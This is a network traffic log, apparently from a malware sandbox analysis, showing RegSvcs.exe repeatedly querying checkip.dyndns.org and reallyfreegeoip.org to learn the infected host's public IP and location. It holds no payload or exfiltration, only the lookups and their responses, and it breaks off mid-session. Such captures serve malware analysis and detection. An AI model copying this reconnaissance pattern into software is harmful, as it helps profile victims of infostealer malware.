Pragma: no-cache
X-Request-ID: 43b09c3307ec48defbab5e5fa06ab9a4
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Jul 31, 2024 09:00:31.588527918 CEST | 320 | IN | HTTP/1.1 200 OK
Date: Wed, 31 Jul 2024 07:00:31 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 43b09c3307ec48defbab5e5fa06ab9a4
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Jul 31, 2024 09:00:32.315922976 CEST | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jul 31, 2024 09:00:32.522100925 CEST | 320 | IN | HTTP/1.1 200 OK
Date: Wed, 31 Jul 2024 07:00:32 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 9e58a46c23ca5f9982a2206d48fff44f
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49705 | 132.226.247.73 | 80 | 1104 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jul 31, 2024 09:00:33.129033089 CEST | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jul 31, 2024 09:00:33.814076900 CEST | 320 | IN | HTTP/1.1 200 OK
Date: Wed, 31 Jul 2024 07:00:33 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 67f088a32d4ca5954f68d8594010c4ba
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49707 | 132.226.247.73 | 80 | 1104 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jul 31, 2024 09:00:34.452337980 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jul 31, 2024 09:00:35.121427059 CEST | 320 | IN | HTTP/1.1 200 OK
Date: Wed, 31 Jul 2024 07:00:35 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 1ae59dace1e706a79de7077e25398cd5
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49709 | 132.226.247.73 | 80 | 1104 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jul 31, 2024 09:00:35.738308907 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jul 31, 2024 09:00:36.434078932 CEST | 320 | IN | HTTP/1.1 200 OK
Date: Wed, 31 Jul 2024 07:00:36 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: b662c4a382a15b71e5412f23a42e379e
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49711 | 132.226.247.73 | 80 | 1104 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jul 31, 2024 09:00:37.067643881 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jul 31, 2024 09:00:38.744698048 CEST | 320 | IN | HTTP/1.1 200 OK
Date: Wed, 31 Jul 2024 07:00:38 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: bb88745a1c4ca6883f7a102499dce4ef
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 49713 | 132.226.247.73 | 80 | 1104 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jul 31, 2024 09:00:40.394596100 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jul 31, 2024 09:00:42.133896112 CEST | 320 | IN | HTTP/1.1 200 OK
Date: Wed, 31 Jul 2024 07:00:42 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 2ceb5114c1191e53b5761a7258cfe290
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.7 | 49715 | 132.226.247.73 | 80 | 1104 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jul 31, 2024 09:00:42.764475107 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jul 31, 2024 09:00:43.436903000 CEST | 320 | IN | HTTP/1.1 200 OK
Date: Wed, 31 Jul 2024 07:00:43 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 3168c859586578ab669cd8fccc9e0699
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.7 | 49717 | 132.226.247.73 | 80 | 1104 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jul 31, 2024 09:00:44.039377928 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jul 31, 2024 09:00:44.709991932 CEST | 320 | IN | HTTP/1.1 200 OK
Date: Wed, 31 Jul 2024 07:00:44 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: cc54f7498182d22d6e3242a457aa77c1
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49703 | 188.114.96.3 | 443 | 1104 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-31 07:00:32 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-07-31 07:00:32 UTC | 715 | IN | HTTP/1.1 200 OK
Date: Wed, 31 Jul 2024 07:00:32 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 5610
Last-Modified: Wed, 31 Jul 2024 05:27:02 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9tUQiO9n16vtdwyFgAMIrGLKT3Elu%2FrFAbZjp7mtRUX5idiOd3ti%2FPg%2BmCsDem%2BRyT%2BKe8fXktTtqaOE4fLX47HE0oeBKPnn9f%2FV3ul6gGTkaHUgJ%2BWJymGUwS%2FNEEWaxfb1U4R6"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8abbb6458d4f41ec-EWR
alt-svc: h3=":443"; ma=86400
2024-07-31 07:00:32 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-31 07:00:32 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49704 | 188.114.96.3 | 443 | 1104 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-31 07:00:32 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
2024-07-31 07:00:33 UTC | 701 | IN | HTTP/1.1 200 OK
Date: Wed, 31 Jul 2024 07:00:33 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 5611
Last-Modified: Wed, 31 Jul 2024 05:27:02 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gwQsINqMtOfgxjugvYErR80AuLjDGacVctOorNmBzAKNtvfadiVct4JyjUfAEYi2sA49Zg3Eb0WwkPWHWKpRDL6%2F6AxcphFkne8LoUcc2N0kNq5CQQeVHcJLcBv7HiOJBK0tgBe9"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8abbb64aaabc7c99-EWR
alt-svc: h3=":443"; ma=86400
2024-07-31 07:00:33 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-31 07:00:33 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 2 | Source IP: 192.168.2.7 | Source Port: 49706 | Destination IP: 188.114.96.3 | Destination Port: 443 | PID: 1104 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2024-07-31 07:00:34 UTC | 84 | OUT |
GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-07-31 07:00:34 UTC | 711 | IN |
HTTP/1.1 200 OK
Date: Wed, 31 Jul 2024 07:00:34 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 5612
Last-Modified: Wed, 31 Jul 2024 05:27:02 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UKDlIPwyzddha3dlyRuGGegt%2FWbFpCCQ3wx3OnINWuf%2F9QnXuIQvbBPaEOLpBtM%2BdojVAp%2BZrk86zOo3%2FddoByjaBCJphhBwd76cp8wQrKfuBUQBqfSAGcrP5X%2BiP2PzplWIn9jW"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8abbb652d8a67280-EWR
alt-svc: h3=":443"; ma=86400
2024-07-31 07:00:34 UTC | 340 | IN | (decoded chunked XML body; the report's dump stops at this point)
14d
<Response>
  <IP>8.46.123.33</IP>
  <CountryCode>US</CountryCode>
  <CountryName>United States</CountryName>
  <RegionCode></RegionCode>
  <RegionName></RegionName>
  <City></City>
  <ZipCode></ZipCode>
  <TimeZone>America/Chicago</TimeZone>
  <Latitude>37.75
2024-07-31 07:00:34 UTC | 5 | IN | (terminating zero-length chunk)
0


Session ID: 3 | Source IP: 192.168.2.7 | Source Port: 49708 | Destination IP: 188.114.96.3 | Destination Port: 443 | PID: 1104 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2024-07-31 07:00:35 UTC | 84 | OUT |
GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-07-31 07:00:35 UTC | 707 | IN |
HTTP/1.1 200 OK
Date: Wed, 31 Jul 2024 07:00:35 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 5613
Last-Modified: Wed, 31 Jul 2024 05:27:02 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a9520tVE3pr%2F7SfbLR9jUBWg%2BEeiK4BpdxI3L7vkM20a%2F7V7JxOoZYW3VFouF6nmKbm3a6ovFfowLkrw2roZAfAnlJ8K3QaZw2%2BH7hyAgbcX9RmjfkkBHYUXAScNWEPrzGD4eyEG"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8abbb65afba3c328-EWR
alt-svc: h3=":443"; ma=86400
2024-07-31 07:00:35 UTC | 340 | IN | (decoded chunked XML body; the report's dump stops at this point)
14d
<Response>
  <IP>8.46.123.33</IP>
  <CountryCode>US</CountryCode>
  <CountryName>United States</CountryName>
  <RegionCode></RegionCode>
  <RegionName></RegionName>
  <City></City>
  <ZipCode></ZipCode>
  <TimeZone>America/Chicago</TimeZone>
  <Latitude>37.75
2024-07-31 07:00:35 UTC | 5 | IN | (terminating zero-length chunk)
0


Session ID: 4 | Source IP: 192.168.2.7 | Source Port: 49710 | Destination IP: 188.114.96.3 | Destination Port: 443 | PID: 1104 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2024-07-31 07:00:36 UTC | 60 | OUT |
GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
2024-07-31 07:00:37 UTC | 703 | IN |
HTTP/1.1 200 OK
Date: Wed, 31 Jul 2024 07:00:37 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 5615
Last-Modified: Wed, 31 Jul 2024 05:27:02 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m54q6j1DpivIPE0wvjLYSrg72HiRzql38gV%2FXZCi%2B6FuwaJs5LHJPgR1jb6vqHmrECJoPO4oWKG261rXoym2axhk4tbxhFuH6aUxHwQflDsHvfWhinUil8txV8ym5JGk5BxdVqTY"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8abbb6633c514302-EWR
alt-svc: h3=":443"; ma=86400
2024-07-31 07:00:37 UTC | 340 | IN | (decoded chunked XML body; the report's dump stops at this point)
14d
<Response>
  <IP>8.46.123.33</IP>
  <CountryCode>US</CountryCode>
  <CountryName>United States</CountryName>
  <RegionCode></RegionCode>
  <RegionName></RegionName>
  <City></City>
  <ZipCode></ZipCode>
  <TimeZone>America/Chicago</TimeZone>
  <Latitude>37.75
2024-07-31 07:00:37 UTC | 5 | IN | (terminating zero-length chunk)
0


Session ID: 5 | Source IP: 192.168.2.7 | Source Port: 49712 | Destination IP: 188.114.96.3 | Destination Port: 443 | PID: 1104 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2024-07-31 07:00:39 UTC | 60 | OUT |
GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
2024-07-31 07:00:40 UTC | 703 | IN |
HTTP/1.1 200 OK
Date: Wed, 31 Jul 2024 07:00:39 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 5617
Last-Modified: Wed, 31 Jul 2024 05:27:02 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oK0SS4G7JUxldr6GTvPQBWDT2zYbyfBdfE%2FkGVlG16T9WlEokauiqABD1nM6uYASQ7EDtTZ%2BHbUI3EFzCKwlN2wwggCWAQbruEJQw39wBRKz9mNQFPRSCqnPcesuXgT3bJtUWiaV"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8abbb6718865423b-EWR
alt-svc: h3=":443"; ma=86400
2024-07-31 07:00:40 UTC | 340 | IN | (decoded chunked XML body; the report's dump stops at this point)
14d
<Response>
  <IP>8.46.123.33</IP>
  <CountryCode>US</CountryCode>
  <CountryName>United States</CountryName>
  <RegionCode></RegionCode>
  <RegionName></RegionName>
  <City></City>
  <ZipCode></ZipCode>
  <TimeZone>America/Chicago</TimeZone>
  <Latitude>37.75
2024-07-31 07:00:40 UTC | 5 | IN | (terminating zero-length chunk)
0


Session ID: 6 | Source IP: 192.168.2.7 | Source Port: 49714 | Destination IP: 188.114.96.3 | Destination Port: 443 | PID: 1104 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2024-07-31 07:00:42 UTC | 84 | OUT |
GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-07-31 07:00:42 UTC | 705 | IN |
HTTP/1.1 200 OK
Date: Wed, 31 Jul 2024 07:00:42 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 5620
Last-Modified: Wed, 31 Jul 2024 05:27:02 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wn97%2FVhtCrPa8pkGwO2UgKPUyFTnQI7AXBBpPt9Q7kVv7mkQTglzv5oTgiJBXaRy6CnYDZsYF7TbjJd0dSzCn%2FTlAKwP3jOEirm2TkdtokqPj5oVTERO2EX3RdwtR%2BP1DNlKoW6D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8abbb686dfdac34d-EWR
alt-svc: h3=":443"; ma=86400
2024-07-31 07:00:42 UTC | 340 | IN | (decoded chunked XML body; the report's dump stops at this point)
14d
<Response>
  <IP>8.46.123.33</IP>
  <CountryCode>US</CountryCode>
  <CountryName>United States</CountryName>
  <RegionCode></RegionCode>
  <RegionName></RegionName>
  <City></City>
  <ZipCode></ZipCode>
  <TimeZone>America/Chicago</TimeZone>
  <Latitude>37.75
2024-07-31 07:00:42 UTC | 5 | IN | (terminating zero-length chunk)
0


Session ID: 7 | Source IP: 192.168.2.7 | Source Port: 49716 | Destination IP: 188.114.96.3 | Destination Port: 443 | PID: 1104 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2024-07-31 07:00:43 UTC | 60 | OUT |
GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
2024-07-31 07:00:44 UTC | 709 | IN |
HTTP/1.1 200 OK
Date: Wed, 31 Jul 2024 07:00:43 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 5621
Last-Modified: Wed, 31 Jul 2024 05:27:02 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7PA0UB%2BLX6PKlaEj6vm76yfjxgdWZwYKXKR2k4F0lHsGJZqRigszwCSV%2B5C%2B4vxTR%2FVS9decScKy8Tgr%2BAaDxdBQ3T1KTDnbjpaTNCi63BCWeLhCBRjCZKHUGho3OhbnBEkGLQm6"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8abbb68ecdcdc33a-EWR
alt-svc: h3=":443"; ma=86400
2024-07-31 07:00:44 UTC | 340 | IN | (decoded chunked XML body; the report's dump stops at this point)
14d
<Response>
  <IP>8.46.123.33</IP>
  <CountryCode>US</CountryCode>
  <CountryName>United States</CountryName>
  <RegionCode></RegionCode>
  <RegionName></RegionName>
  <City></City>
  <ZipCode></ZipCode>
  <TimeZone>America/Chicago</TimeZone>
  <Latitude>37.75
2024-07-31 07:00:44 UTC | 5 | IN | (terminating zero-length chunk)
0


Session ID: 8 | Source IP: 192.168.2.7 | Source Port: 49719 | Destination IP: 188.114.96.3 | Destination Port: 443 | PID: 1104 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2024-07-31 07:00:45 UTC | 60 | OUT |
GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
2024-07-31 07:00:45 UTC | 711 | IN |
HTTP/1.1 200 OK
Date: Wed, 31 Jul 2024 07:00:45 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
